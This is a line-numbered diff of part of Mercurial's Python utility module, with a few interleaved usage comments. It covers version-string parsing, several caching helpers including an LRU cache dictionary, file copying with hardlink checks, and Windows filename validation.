957 957 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
958 958 self.name, level, optname, value, res))
959 959
960 960 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
961 961 logdata=False, logdataapis=True):
962 962 """Turn a socket into a logging socket."""
963 963
964 964 observer = socketobserver(logh, name, reads=reads, writes=writes,
965 965 states=states, logdata=logdata,
966 966 logdataapis=logdataapis)
967 967 return socketproxy(fh, observer)
968 968
969 969 def version():
970 970 """Return version information if available."""
971 971 try:
972 972 from . import __version__
973 973 return __version__.version
974 974 except ImportError:
975 975 return 'unknown'
976 976
977 977 def versiontuple(v=None, n=4):
978 978 """Parses a Mercurial version string into an N-tuple.
979 979
980 980 The version string to be parsed is specified with the ``v`` argument.
981 981 If it isn't defined, the current Mercurial version string will be parsed.
982 982
983 983 ``n`` can be 2, 3, or 4. Here is how some version strings map to
984 984 returned values:
985 985
986 986 >>> v = b'3.6.1+190-df9b73d2d444'
987 987 >>> versiontuple(v, 2)
988 988 (3, 6)
989 989 >>> versiontuple(v, 3)
990 990 (3, 6, 1)
991 991 >>> versiontuple(v, 4)
992 992 (3, 6, 1, '190-df9b73d2d444')
993 993
994 994 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
995 995 (3, 6, 1, '190-df9b73d2d444+20151118')
996 996
997 997 >>> v = b'3.6'
998 998 >>> versiontuple(v, 2)
999 999 (3, 6)
1000 1000 >>> versiontuple(v, 3)
1001 1001 (3, 6, None)
1002 1002 >>> versiontuple(v, 4)
1003 1003 (3, 6, None, None)
1004 1004
1005 1005 >>> v = b'3.9-rc'
1006 1006 >>> versiontuple(v, 2)
1007 1007 (3, 9)
1008 1008 >>> versiontuple(v, 3)
1009 1009 (3, 9, None)
1010 1010 >>> versiontuple(v, 4)
1011 1011 (3, 9, None, 'rc')
1012 1012
1013 1013 >>> v = b'3.9-rc+2-02a8fea4289b'
1014 1014 >>> versiontuple(v, 2)
1015 1015 (3, 9)
1016 1016 >>> versiontuple(v, 3)
1017 1017 (3, 9, None)
1018 1018 >>> versiontuple(v, 4)
1019 1019 (3, 9, None, 'rc+2-02a8fea4289b')
1020 1020
1021 1021 >>> versiontuple(b'4.6rc0')
1022 1022 (4, 6, None, 'rc0')
1023 1023 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1024 1024 (4, 6, None, 'rc0+12-425d55e54f98')
1025 1025 >>> versiontuple(b'.1.2.3')
1026 1026 (None, None, None, '.1.2.3')
1027 1027 >>> versiontuple(b'12.34..5')
1028 1028 (12, 34, None, '..5')
1029 1029 >>> versiontuple(b'1.2.3.4.5.6')
1030 1030 (1, 2, 3, '.4.5.6')
1031 1031 """
1032 1032 if not v:
1033 1033 v = version()
1034 1034 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1035 1035 if not m:
1036 1036 vparts, extra = '', v
1037 1037 elif m.group(2):
1038 1038 vparts, extra = m.groups()
1039 1039 else:
1040 1040 vparts, extra = m.group(1), None
1041 1041
1042 1042 vints = []
1043 1043 for i in vparts.split('.'):
1044 1044 try:
1045 1045 vints.append(int(i))
1046 1046 except ValueError:
1047 1047 break
1048 1048 # (3, 6) -> (3, 6, None)
1049 1049 while len(vints) < 3:
1050 1050 vints.append(None)
1051 1051
1052 1052 if n == 2:
1053 1053 return (vints[0], vints[1])
1054 1054 if n == 3:
1055 1055 return (vints[0], vints[1], vints[2])
1056 1056 if n == 4:
1057 1057 return (vints[0], vints[1], vints[2], extra)
1058 1058
1059 1059 def cachefunc(func):
1060 1060 '''cache the result of function calls'''
1061 1061 # XXX doesn't handle keyword args
1062 1062 if func.__code__.co_argcount == 0:
1063 1063 cache = []
1064 1064 def f():
1065 1065 if len(cache) == 0:
1066 1066 cache.append(func())
1067 1067 return cache[0]
1068 1068 return f
1069 1069 cache = {}
1070 1070 if func.__code__.co_argcount == 1:
1071 1071 # we gain a small amount of time because
1072 1072 # we don't need to pack/unpack the list
1073 1073 def f(arg):
1074 1074 if arg not in cache:
1075 1075 cache[arg] = func(arg)
1076 1076 return cache[arg]
1077 1077 else:
1078 1078 def f(*args):
1079 1079 if args not in cache:
1080 1080 cache[args] = func(*args)
1081 1081 return cache[args]
1082 1082
1083 1083 return f
1084 1084
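# Usage sketch (illustrative): memoize a pure single-argument function. Note
# that this cache is unbounded; lrucachefunc below keeps a bounded number of
# entries instead.
#
#   @cachefunc
#   def _parseconfig(path):
#       ...                    # hypothetical expensive, deterministic work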
1085 1085 class cow(object):
1086 1086 """helper class to make copy-on-write easier
1087 1087
1088 1088 Call preparewrite before doing any writes.
1089 1089 """
1090 1090
1091 1091 def preparewrite(self):
1092 1092 """call this before writes, return self or a copied new object"""
1093 1093 if getattr(self, '_copied', 0):
1094 1094 self._copied -= 1
1095 1095 return self.__class__(self)
1096 1096 return self
1097 1097
1098 1098 def copy(self):
1099 1099 """always do a cheap copy"""
1100 1100 self._copied = getattr(self, '_copied', 0) + 1
1101 1101 return self
1102 1102
1103 1103 class sortdict(collections.OrderedDict):
1104 1104 '''a simple sorted dictionary
1105 1105
1106 1106 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1107 1107 >>> d2 = d1.copy()
1108 1108 >>> d2
1109 1109 sortdict([('a', 0), ('b', 1)])
1110 1110 >>> d2.update([(b'a', 2)])
1111 1111 >>> list(d2.keys()) # should still be in last-set order
1112 1112 ['b', 'a']
1113 1113 '''
1114 1114
1115 1115 def __setitem__(self, key, value):
1116 1116 if key in self:
1117 1117 del self[key]
1118 1118 super(sortdict, self).__setitem__(key, value)
1119 1119
1120 1120 if pycompat.ispypy:
1121 1121 # __setitem__() isn't called as of PyPy 5.8.0
1122 1122 def update(self, src):
1123 1123 if isinstance(src, dict):
1124 1124 src = src.iteritems()
1125 1125 for k, v in src:
1126 1126 self[k] = v
1127 1127
1128 1128 class cowdict(cow, dict):
1129 1129 """copy-on-write dict
1130 1130
1131 1131 Be sure to call d = d.preparewrite() before writing to d.
1132 1132
1133 1133 >>> a = cowdict()
1134 1134 >>> a is a.preparewrite()
1135 1135 True
1136 1136 >>> b = a.copy()
1137 1137 >>> b is a
1138 1138 True
1139 1139 >>> c = b.copy()
1140 1140 >>> c is a
1141 1141 True
1142 1142 >>> a = a.preparewrite()
1143 1143 >>> b is a
1144 1144 False
1145 1145 >>> a is a.preparewrite()
1146 1146 True
1147 1147 >>> c = c.preparewrite()
1148 1148 >>> b is c
1149 1149 False
1150 1150 >>> b is b.preparewrite()
1151 1151 True
1152 1152 """
1153 1153
1154 1154 class cowsortdict(cow, sortdict):
1155 1155 """copy-on-write sortdict
1156 1156
1157 1157 Be sure to call d = d.preparewrite() before writing to d.
1158 1158 """
1159 1159
1160 1160 class transactional(object):
1161 1161 """Base class for making a transactional type into a context manager."""
1162 1162 __metaclass__ = abc.ABCMeta
1163 1163
1164 1164 @abc.abstractmethod
1165 1165 def close(self):
1166 1166 """Successfully closes the transaction."""
1167 1167
1168 1168 @abc.abstractmethod
1169 1169 def release(self):
1170 1170 """Marks the end of the transaction.
1171 1171
1172 1172 If the transaction has not been closed, it will be aborted.
1173 1173 """
1174 1174
1175 1175 def __enter__(self):
1176 1176 return self
1177 1177
1178 1178 def __exit__(self, exc_type, exc_val, exc_tb):
1179 1179 try:
1180 1180 if exc_type is None:
1181 1181 self.close()
1182 1182 finally:
1183 1183 self.release()
1184 1184
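# Minimal subclass sketch (illustrative): implementing close() and release()
# is enough to make a transactional type usable as a context manager that
# commits on success and always releases.
#
#   class mytxn(transactional):
#       def close(self):
#           ...               # commit
#       def release(self):
#           ...               # abort if not closed, then clean up
#
#   with mytxn() as tr:
#       ...                   # mutate state under the transaction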
1185 1185 @contextlib.contextmanager
1186 1186 def acceptintervention(tr=None):
1187 1187 """A context manager that closes the transaction on InterventionRequired
1188 1188
1189 1189 If no transaction was provided, this simply runs the body and returns
1190 1190 """
1191 1191 if not tr:
1192 1192 yield
1193 1193 return
1194 1194 try:
1195 1195 yield
1196 1196 tr.close()
1197 1197 except error.InterventionRequired:
1198 1198 tr.close()
1199 1199 raise
1200 1200 finally:
1201 1201 tr.release()
1202 1202
1203 1203 @contextlib.contextmanager
1204 1204 def nullcontextmanager():
1205 1205 yield
1206 1206
1207 1207 class _lrucachenode(object):
1208 1208 """A node in a doubly linked list.
1209 1209
1210 1210 Holds a reference to nodes on either side as well as a key-value
1211 1211 pair for the dictionary entry.
1212 1212 """
1213 1213 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1214 1214
1215 1215 def __init__(self):
1216 1216 self.next = None
1217 1217 self.prev = None
1218 1218
1219 1219 self.key = _notset
1220 1220 self.value = None
1221 1221 self.cost = 0
1222 1222
1223 1223 def markempty(self):
1224 1224 """Mark the node as emptied."""
1225 1225 self.key = _notset
1226 1226 self.value = None
1227 1227 self.cost = 0
1228 1228
1229 1229 class lrucachedict(object):
1230 1230 """Dict that caches most recent accesses and sets.
1231 1231
1232 1232 The dict consists of an actual backing dict - indexed by original
1233 1233 key - and a doubly linked circular list defining the order of entries in
1234 1234 the cache.
1235 1235
1236 1236 The head node is the newest entry in the cache. If the cache is full,
1237 1237 we recycle head.prev and make it the new head. Cache accesses result in
1238 1238 the node being moved to before the existing head and being marked as the
1239 1239 new head node.
1240 1240
1241 1241 Items in the cache can be inserted with an optional "cost" value. This is
1242 1242 simply an integer that is specified by the caller. The cache can be queried
1243 1243 for the total cost of all items presently in the cache.
1244 1244
1245 1245 The cache can also define a maximum cost. If a cache insertion would
1246 1246 cause the total cost of the cache to go beyond the maximum cost limit,
1247 1247 nodes will be evicted to make room for the new node. This can be used
1248 1248 to e.g. set a max memory limit and associate an estimated bytes size
1249 1249 cost to each item in the cache. By default, no maximum cost is enforced.
1250 1250 """
1251 1251 def __init__(self, max, maxcost=0):
1252 1252 self._cache = {}
1253 1253
1254 1254 self._head = head = _lrucachenode()
1255 1255 head.prev = head
1256 1256 head.next = head
1257 1257 self._size = 1
1258 1258 self.capacity = max
1259 1259 self.totalcost = 0
1260 1260 self.maxcost = maxcost
1261 1261
1262 1262 def __len__(self):
1263 1263 return len(self._cache)
1264 1264
1265 1265 def __contains__(self, k):
1266 1266 return k in self._cache
1267 1267
1268 1268 def __iter__(self):
1269 1269 # We don't have to iterate in cache order, but why not.
1270 1270 n = self._head
1271 1271 for i in range(len(self._cache)):
1272 1272 yield n.key
1273 1273 n = n.next
1274 1274
1275 1275 def __getitem__(self, k):
1276 1276 node = self._cache[k]
1277 1277 self._movetohead(node)
1278 1278 return node.value
1279 1279
1280 1280 def insert(self, k, v, cost=0):
1281 1281 """Insert a new item in the cache with optional cost value."""
1282 1282 node = self._cache.get(k)
1283 1283 # Replace existing value and mark as newest.
1284 1284 if node is not None:
1285 1285 self.totalcost -= node.cost
1286 1286 node.value = v
1287 1287 node.cost = cost
1288 1288 self.totalcost += cost
1289 1289 self._movetohead(node)
1290 1290
1291 1291 if self.maxcost:
1292 1292 self._enforcecostlimit()
1293 1293
1294 1294 return
1295 1295
1296 1296 if self._size < self.capacity:
1297 1297 node = self._addcapacity()
1298 1298 else:
1299 1299 # Grab the last/oldest item.
1300 1300 node = self._head.prev
1301 1301
1302 1302 # At capacity. Kill the old entry.
1303 1303 if node.key is not _notset:
1304 1304 self.totalcost -= node.cost
1305 1305 del self._cache[node.key]
1306 1306
1307 1307 node.key = k
1308 1308 node.value = v
1309 1309 node.cost = cost
1310 1310 self.totalcost += cost
1311 1311 self._cache[k] = node
1312 1312 # And mark it as newest entry. No need to adjust order since it
1313 1313 # is already self._head.prev.
1314 1314 self._head = node
1315 1315
1316 1316 if self.maxcost:
1317 1317 self._enforcecostlimit()
1318 1318
1319 1319 def __setitem__(self, k, v):
1320 1320 self.insert(k, v)
1321 1321
1322 1322 def __delitem__(self, k):
1323 1323 node = self._cache.pop(k)
1324 1324 self.totalcost -= node.cost
1325 1325 node.markempty()
1326 1326
1327 1327 # Temporarily mark as newest item before re-adjusting head to make
1328 1328 # this node the oldest item.
1329 1329 self._movetohead(node)
1330 1330 self._head = node.next
1331 1331
1332 1332 # Additional dict methods.
1333 1333
1334 1334 def get(self, k, default=None):
1335 1335 try:
1336 1336 return self.__getitem__(k)
1337 1337 except KeyError:
1338 1338 return default
1339 1339
1340 1340 def clear(self):
1341 1341 n = self._head
1342 1342 while n.key is not _notset:
1343 1343 self.totalcost -= n.cost
1344 1344 n.markempty()
1345 1345 n = n.next
1346 1346
1347 1347 self._cache.clear()
1348 1348
1349 1349 def copy(self, capacity=None, maxcost=0):
1350 1350 """Create a new cache as a copy of the current one.
1351 1351
1352 1352 By default, the new cache has the same capacity as the existing one.
1353 1353 But, the cache capacity can be changed as part of performing the
1354 1354 copy.
1355 1355
1356 1356 Items in the copy have an insertion/access order matching this
1357 1357 instance.
1358 1358 """
1359 1359
1360 1360 capacity = capacity or self.capacity
1361 1361 maxcost = maxcost or self.maxcost
1362 1362 result = lrucachedict(capacity, maxcost=maxcost)
1363 1363
1364 1364 # We copy entries by iterating in oldest-to-newest order so the copy
1365 1365 # has the correct ordering.
1366 1366
1367 1367 # Find the first non-empty entry.
1368 1368 n = self._head.prev
1369 1369 while n.key is _notset and n is not self._head:
1370 1370 n = n.prev
1371 1371
1372 1372 # We could potentially skip the first N items when decreasing capacity.
1373 1373 # But let's keep it simple unless it is a performance problem.
1374 1374 for i in range(len(self._cache)):
1375 1375 result.insert(n.key, n.value, cost=n.cost)
1376 1376 n = n.prev
1377 1377
1378 1378 return result
1379 1379
1380 1380 def popoldest(self):
1381 1381 """Remove the oldest item from the cache.
1382 1382
1383 1383 Returns the (key, value) describing the removed cache entry.
1384 1384 """
1385 1385 if not self._cache:
1386 1386 return
1387 1387
1388 1388 # Walk the linked list backwards starting at tail node until we hit
1389 1389 # a non-empty node.
1390 1390 n = self._head.prev
1391 1391 while n.key is _notset:
1392 1392 n = n.prev
1393 1393
1394 1394 key, value = n.key, n.value
1395 1395
1396 1396 # And remove it from the cache and mark it as empty.
1397 1397 del self._cache[n.key]
1398 1398 self.totalcost -= n.cost
1399 1399 n.markempty()
1400 1400
1401 1401 return key, value
1402 1402
1403 1403 def _movetohead(self, node):
1404 1404 """Mark a node as the newest, making it the new head.
1405 1405
1406 1406 When a node is accessed, it becomes the freshest entry in the LRU
1407 1407 list, which is denoted by self._head.
1408 1408
1409 1409 Visually, let's make ``N`` the new head node (* denotes head):
1410 1410
1411 1411 previous/oldest <-> head <-> next/next newest
1412 1412
1413 1413 ----<->--- A* ---<->-----
1414 1414 | |
1415 1415 E <-> D <-> N <-> C <-> B
1416 1416
1417 1417 To:
1418 1418
1419 1419 ----<->--- N* ---<->-----
1420 1420 | |
1421 1421 E <-> D <-> C <-> B <-> A
1422 1422
1423 1423 This requires the following moves:
1424 1424
1425 1425 C.next = D (node.prev.next = node.next)
1426 1426 D.prev = C (node.next.prev = node.prev)
1427 1427 E.next = N (head.prev.next = node)
1428 1428 N.prev = E (node.prev = head.prev)
1429 1429 N.next = A (node.next = head)
1430 1430 A.prev = N (head.prev = node)
1431 1431 """
1432 1432 head = self._head
1433 1433 # C.next = D
1434 1434 node.prev.next = node.next
1435 1435 # D.prev = C
1436 1436 node.next.prev = node.prev
1437 1437 # N.prev = E
1438 1438 node.prev = head.prev
1439 1439 # N.next = A
1440 1440 # It is tempting to do just "head" here, however if node is
1441 1441 # adjacent to head, this will do bad things.
1442 1442 node.next = head.prev.next
1443 1443 # E.next = N
1444 1444 node.next.prev = node
1445 1445 # A.prev = N
1446 1446 node.prev.next = node
1447 1447
1448 1448 self._head = node
1449 1449
1450 1450 def _addcapacity(self):
1451 1451 """Add a node to the circular linked list.
1452 1452
1453 1453 The new node is inserted before the head node.
1454 1454 """
1455 1455 head = self._head
1456 1456 node = _lrucachenode()
1457 1457 head.prev.next = node
1458 1458 node.prev = head.prev
1459 1459 node.next = head
1460 1460 head.prev = node
1461 1461 self._size += 1
1462 1462 return node
1463 1463
1464 1464 def _enforcecostlimit(self):
1465 1465 # This should run after an insertion. It should only be called if total
1466 1466 # cost limits are being enforced.
1467 1467 # The most recently inserted node is never evicted.
1468 1468 if len(self) <= 1 or self.totalcost <= self.maxcost:
1469 1469 return
1470 1470
1471 1471 # This is logically equivalent to calling popoldest() until we
1472 1472 # free up enough cost. We don't do that since popoldest() needs
1473 1473 # to walk the linked list and doing this in a loop would be
1474 1474 # quadratic. So we find the first non-empty node and then
1475 1475 # walk nodes until we free up enough capacity.
1476 1476 #
1477 1477 # If we only removed the minimum number of nodes to free enough
1478 1478 # cost at insert time, chances are high that the next insert would
1479 1479 # also require pruning. This would effectively constitute quadratic
1480 1480 # behavior for insert-heavy workloads. To mitigate this, we set a
1481 1481 # target cost that is a percentage of the max cost. This will tend
1482 1482 # to free more nodes when the high water mark is reached, which
1483 1483 # lowers the chances of needing to prune on the subsequent insert.
1484 1484 targetcost = int(self.maxcost * 0.75)
1485 1485
1486 1486 n = self._head.prev
1487 1487 while n.key is _notset:
1488 1488 n = n.prev
1489 1489
1490 1490 while len(self) > 1 and self.totalcost > targetcost:
1491 1491 del self._cache[n.key]
1492 1492 self.totalcost -= n.cost
1493 1493 n.markempty()
1494 1494 n = n.prev
1495 1495
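# Usage sketch (illustrative): a 100-entry cache that additionally evicts
# once the summed cost exceeds roughly 10 MB, approximating a memory budget.
# 'key' and 'data' are hypothetical names.
#
#   cache = lrucachedict(100, maxcost=10 * 1024 * 1024)
#   cache.insert(key, data, cost=len(data))
#   hit = cache.get(key)   # None on a miss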
1496 1496 def lrucachefunc(func):
1497 1497 '''cache most recent results of function calls'''
1498 1498 cache = {}
1499 1499 order = collections.deque()
1500 1500 if func.__code__.co_argcount == 1:
1501 1501 def f(arg):
1502 1502 if arg not in cache:
1503 1503 if len(cache) > 20:
1504 1504 del cache[order.popleft()]
1505 1505 cache[arg] = func(arg)
1506 1506 else:
1507 1507 order.remove(arg)
1508 1508 order.append(arg)
1509 1509 return cache[arg]
1510 1510 else:
1511 1511 def f(*args):
1512 1512 if args not in cache:
1513 1513 if len(cache) > 20:
1514 1514 del cache[order.popleft()]
1515 1515 cache[args] = func(*args)
1516 1516 else:
1517 1517 order.remove(args)
1518 1518 order.append(args)
1519 1519 return cache[args]
1520 1520
1521 1521 return f
1522 1522
1523 1523 class propertycache(object):
1524 1524 def __init__(self, func):
1525 1525 self.func = func
1526 1526 self.name = func.__name__
1527 1527 def __get__(self, obj, type=None):
1528 1528 result = self.func(obj)
1529 1529 self.cachevalue(obj, result)
1530 1530 return result
1531 1531
1532 1532 def cachevalue(self, obj, value):
1533 1533 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1534 1534 obj.__dict__[self.name] = value
1535 1535
1536 1536 def clearcachedproperty(obj, prop):
1537 1537 '''clear a cached property value, if one has been set'''
1538 prop = pycompat.sysstr(prop)
1538 1539 if prop in obj.__dict__:
1539 1540 del obj.__dict__[prop]
1540 1541
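# Usage sketch (illustrative): propertycache stores the computed value in
# obj.__dict__ under func.__name__, which is a native str on Python 3, so
# clearcachedproperty() casts its (typically bytes) argument with sysstr
# before the lookup. 'repoobj' and the loader below are hypothetical.
#
#   class repoobj(object):
#       @propertycache
#       def changelog(self):
#           return _loadchangelog(self)   # hypothetical expensive loader
#
#   r = repoobj()
#   r.changelog                           # computed once, then cached
#   clearcachedproperty(r, b'changelog')  # recomputed on next access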
1541 1542 def increasingchunks(source, min=1024, max=65536):
1542 1543 '''return no less than min bytes per chunk while data remains,
1543 1544 doubling min after each chunk until it reaches max'''
1544 1545 def log2(x):
1545 1546 if not x:
1546 1547 return 0
1547 1548 i = 0
1548 1549 while x:
1549 1550 x >>= 1
1550 1551 i += 1
1551 1552 return i - 1
1552 1553
1553 1554 buf = []
1554 1555 blen = 0
1555 1556 for chunk in source:
1556 1557 buf.append(chunk)
1557 1558 blen += len(chunk)
1558 1559 if blen >= min:
1559 1560 if min < max:
1560 1561 min = min << 1
1561 1562 nmin = 1 << log2(blen)
1562 1563 if nmin > min:
1563 1564 min = nmin
1564 1565 if min > max:
1565 1566 min = max
1566 1567 yield ''.join(buf)
1567 1568 blen = 0
1568 1569 buf = []
1569 1570 if buf:
1570 1571 yield ''.join(buf)
1571 1572
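# Example (illustrative): input chunks are regrouped so each yielded piece
# is at least 'min' bytes, with 'min' doubling toward 'max' as data flows.
#
#   chunks = [b'a' * 600, b'b' * 600, b'c' * 600]
#   out = list(increasingchunks(iter(chunks)))
#   # out[0] is the 1200-byte b'a...b...' chunk (>= 1024), out[1] the rest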
1572 1573 def always(fn):
1573 1574 return True
1574 1575
1575 1576 def never(fn):
1576 1577 return False
1577 1578
1578 1579 def nogc(func):
1579 1580 """disable garbage collector
1580 1581
1581 1582 Python's garbage collector triggers a GC each time a certain number of
1582 1583 container objects (the number being defined by gc.get_threshold()) are
1583 1584 allocated even when marked not to be tracked by the collector. Tracking has
1584 1585 no effect on when GCs are triggered, only on what objects the GC looks
1585 1586 into. As a workaround, disable GC while building complex (huge)
1586 1587 containers.
1587 1588
1588 1589 This garbage collector issue has been fixed in 2.7, but it still affects
1589 1590 CPython's performance.
1590 1591 """
1591 1592 def wrapper(*args, **kwargs):
1592 1593 gcenabled = gc.isenabled()
1593 1594 gc.disable()
1594 1595 try:
1595 1596 return func(*args, **kwargs)
1596 1597 finally:
1597 1598 if gcenabled:
1598 1599 gc.enable()
1599 1600 return wrapper
1600 1601
1601 1602 if pycompat.ispypy:
1602 1603 # PyPy runs slower with gc disabled
1603 1604 nogc = lambda x: x
1604 1605
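# Usage sketch (illustrative): disable the cyclic GC while building a huge
# container, restoring the previous GC state afterwards (a no-op on PyPy).
#
#   @nogc
#   def _buildindex(entries):
#       return dict(entries)   # hypothetical container-heavy work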
1605 1606 def pathto(root, n1, n2):
1606 1607 '''return the relative path from one place to another.
1607 1608 root should use os.sep to separate directories
1608 1609 n1 should use os.sep to separate directories
1609 1610 n2 should use "/" to separate directories
1610 1611 returns an os.sep-separated path.
1611 1612
1612 1613 If n1 is a relative path, it is assumed to be
1613 1614 relative to root.
1614 1615 n2 should always be relative to root.
1615 1616 '''
1616 1617 if not n1:
1617 1618 return localpath(n2)
1618 1619 if os.path.isabs(n1):
1619 1620 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1620 1621 return os.path.join(root, localpath(n2))
1621 1622 n2 = '/'.join((pconvert(root), n2))
1622 1623 a, b = splitpath(n1), n2.split('/')
1623 1624 a.reverse()
1624 1625 b.reverse()
1625 1626 while a and b and a[-1] == b[-1]:
1626 1627 a.pop()
1627 1628 b.pop()
1628 1629 b.reverse()
1629 1630 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1630 1631
1631 1632 # the location of data files matching the source code
1632 1633 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1633 1634 # executable version (py2exe) doesn't support __file__
1634 1635 datapath = os.path.dirname(pycompat.sysexecutable)
1635 1636 else:
1636 1637 datapath = os.path.dirname(pycompat.fsencode(__file__))
1637 1638
1638 1639 i18n.setdatapath(datapath)
1639 1640
1640 1641 def checksignature(func):
1641 1642 '''wrap a function with code to check for calling errors'''
1642 1643 def check(*args, **kwargs):
1643 1644 try:
1644 1645 return func(*args, **kwargs)
1645 1646 except TypeError:
1646 1647 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1647 1648 raise error.SignatureError
1648 1649 raise
1649 1650
1650 1651 return check
1651 1652
1652 1653 # a whitelist of known filesystems where hardlinks work reliably
1653 1654 _hardlinkfswhitelist = {
1654 1655 'apfs',
1655 1656 'btrfs',
1656 1657 'ext2',
1657 1658 'ext3',
1658 1659 'ext4',
1659 1660 'hfs',
1660 1661 'jfs',
1661 1662 'NTFS',
1662 1663 'reiserfs',
1663 1664 'tmpfs',
1664 1665 'ufs',
1665 1666 'xfs',
1666 1667 'zfs',
1667 1668 }
1668 1669
1669 1670 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1670 1671 '''copy a file, preserving mode and optionally other stat info like
1671 1672 atime/mtime
1672 1673
1673 1674 checkambig argument is used with filestat, and is useful only if
1674 1675 destination file is guarded by any lock (e.g. repo.lock or
1675 1676 repo.wlock).
1676 1677
1677 1678 copystat and checkambig should be exclusive.
1678 1679 '''
1679 1680 assert not (copystat and checkambig)
1680 1681 oldstat = None
1681 1682 if os.path.lexists(dest):
1682 1683 if checkambig:
1683 1684 oldstat = checkambig and filestat.frompath(dest)
1684 1685 unlink(dest)
1685 1686 if hardlink:
1686 1687 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1687 1688 # unless we are confident that dest is on a whitelisted filesystem.
1688 1689 try:
1689 1690 fstype = getfstype(os.path.dirname(dest))
1690 1691 except OSError:
1691 1692 fstype = None
1692 1693 if fstype not in _hardlinkfswhitelist:
1693 1694 hardlink = False
1694 1695 if hardlink:
1695 1696 try:
1696 1697 oslink(src, dest)
1697 1698 return
1698 1699 except (IOError, OSError):
1699 1700 pass # fall back to normal copy
1700 1701 if os.path.islink(src):
1701 1702 os.symlink(os.readlink(src), dest)
1702 1703 # copytime is ignored for symlinks, but in general copytime isn't needed
1703 1704 # for them anyway
1704 1705 else:
1705 1706 try:
1706 1707 shutil.copyfile(src, dest)
1707 1708 if copystat:
1708 1709 # copystat also copies mode
1709 1710 shutil.copystat(src, dest)
1710 1711 else:
1711 1712 shutil.copymode(src, dest)
1712 1713 if oldstat and oldstat.stat:
1713 1714 newstat = filestat.frompath(dest)
1714 1715 if newstat.isambig(oldstat):
1715 1716 # stat of copied file is ambiguous to original one
1716 1717 advanced = (
1717 1718 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1718 1719 os.utime(dest, (advanced, advanced))
1719 1720 except shutil.Error as inst:
1720 1721 raise error.Abort(str(inst))
1721 1722
1722 1723 def copyfiles(src, dst, hardlink=None, progress=None):
1723 1724 """Copy a directory tree using hardlinks if possible."""
1724 1725 num = 0
1725 1726
1726 1727 def settopic():
1727 1728 if progress:
1728 1729 progress.topic = _('linking') if hardlink else _('copying')
1729 1730
1730 1731 if os.path.isdir(src):
1731 1732 if hardlink is None:
1732 1733 hardlink = (os.stat(src).st_dev ==
1733 1734 os.stat(os.path.dirname(dst)).st_dev)
1734 1735 settopic()
1735 1736 os.mkdir(dst)
1736 1737 for name, kind in listdir(src):
1737 1738 srcname = os.path.join(src, name)
1738 1739 dstname = os.path.join(dst, name)
1739 1740 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1740 1741 num += n
1741 1742 else:
1742 1743 if hardlink is None:
1743 1744 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
1744 1745 os.stat(os.path.dirname(dst)).st_dev)
1745 1746 settopic()
1746 1747
1747 1748 if hardlink:
1748 1749 try:
1749 1750 oslink(src, dst)
1750 1751 except (IOError, OSError):
1751 1752 hardlink = False
1752 1753 shutil.copy(src, dst)
1753 1754 else:
1754 1755 shutil.copy(src, dst)
1755 1756 num += 1
1756 1757 if progress:
1757 1758 progress.increment()
1758 1759
1759 1760 return hardlink, num
1760 1761
1761 1762 _winreservednames = {
1762 1763 'con', 'prn', 'aux', 'nul',
1763 1764 'com1', 'com2', 'com3', 'com4', 'com5', 'com6', 'com7', 'com8', 'com9',
1764 1765 'lpt1', 'lpt2', 'lpt3', 'lpt4', 'lpt5', 'lpt6', 'lpt7', 'lpt8', 'lpt9',
1765 1766 }
1766 1767 _winreservedchars = ':*?"<>|'
1767 1768 def checkwinfilename(path):
1768 1769 r'''Check that the base-relative path is a valid filename on Windows.
1769 1770 Returns None if the path is ok, or a UI string describing the problem.
1770 1771
1771 1772 >>> checkwinfilename(b"just/a/normal/path")
1772 1773 >>> checkwinfilename(b"foo/bar/con.xml")
1773 1774 "filename contains 'con', which is reserved on Windows"
1774 1775 >>> checkwinfilename(b"foo/con.xml/bar")
1775 1776 "filename contains 'con', which is reserved on Windows"
1776 1777 >>> checkwinfilename(b"foo/bar/xml.con")
1777 1778 >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
1778 1779 "filename contains 'AUX', which is reserved on Windows"
1779 1780 >>> checkwinfilename(b"foo/bar/bla:.txt")
1780 1781 "filename contains ':', which is reserved on Windows"
1781 1782 >>> checkwinfilename(b"foo/bar/b\07la.txt")
1782 1783 "filename contains '\\x07', which is invalid on Windows"
1783 1784 >>> checkwinfilename(b"foo/bar/bla ")
1784 1785 "filename ends with ' ', which is not allowed on Windows"
1785 1786 >>> checkwinfilename(b"../bar")
1786 1787 >>> checkwinfilename(b"foo\\")
1787 1788 "filename ends with '\\', which is invalid on Windows"
1788 1789 >>> checkwinfilename(b"foo\\/bar")
1789 1790 "directory name ends with '\\', which is invalid on Windows"
1790 1791 '''
1791 1792 if path.endswith('\\'):
1792 1793 return _("filename ends with '\\', which is invalid on Windows")
1793 1794 if '\\/' in path:
1794 1795 return _("directory name ends with '\\', which is invalid on Windows")
1795 1796 for n in path.replace('\\', '/').split('/'):
1796 1797 if not n:
1797 1798 continue
1798 1799 for c in _filenamebytestr(n):
1799 1800 if c in _winreservedchars:
1800 1801 return _("filename contains '%s', which is reserved "
1801 1802 "on Windows") % c
1802 1803 if ord(c) <= 31:
1803 1804 return _("filename contains '%s', which is invalid "
1804 1805 "on Windows") % stringutil.escapestr(c)
1805 1806 base = n.split('.')[0]
1806 1807 if base and base.lower() in _winreservednames:
1807 1808 return _("filename contains '%s', which is reserved "
1808 1809 "on Windows") % base
1809 1810 t = n[-1:]
1810 1811 if t in '. ' and n not in '..':
1811 1812 return _("filename ends with '%s', which is not allowed "
1812 1813 "on Windows") % t
1813 1814
1814 1815 if pycompat.iswindows:
1815 1816 checkosfilename = checkwinfilename
1816 1817 timer = time.clock
1817 1818 else:
1818 1819 checkosfilename = platform.checkosfilename
